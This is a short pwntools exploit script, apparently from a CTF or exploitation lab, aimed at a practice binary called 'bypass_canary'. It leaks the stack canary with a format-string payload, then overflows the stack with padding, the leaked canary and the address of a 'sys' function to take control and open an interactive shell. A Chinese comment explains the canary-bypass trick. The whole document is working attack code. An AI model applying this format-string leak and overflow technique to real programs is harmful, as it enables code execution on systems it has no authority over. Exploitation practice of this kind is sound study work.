from pwn import *
context.log_level = 'debug'
context.terminal = ['terminator', '-e']

elf=ELF("./bypass_canary")
p = process('./bypass_canary')

payload = '%25$lx'                                             
p.recvuntil("message:\n")
p.sendline(payload)                                            

ret_msg = p.recvuntil('\n')
canary = int(ret_msg,16)                                      
print hex(canary)  

p.recvuntil('payload:')                                        

#在Canary地址覆盖Canary原本的值，不改变Canary的值从而绕过检查
payload = 17 * 'AAAAAAAA' +p64(canary)+p64(0) +p64(elf.sym["sys"]) 

p.sendline(payload)                                               

p.interactive()

p.close()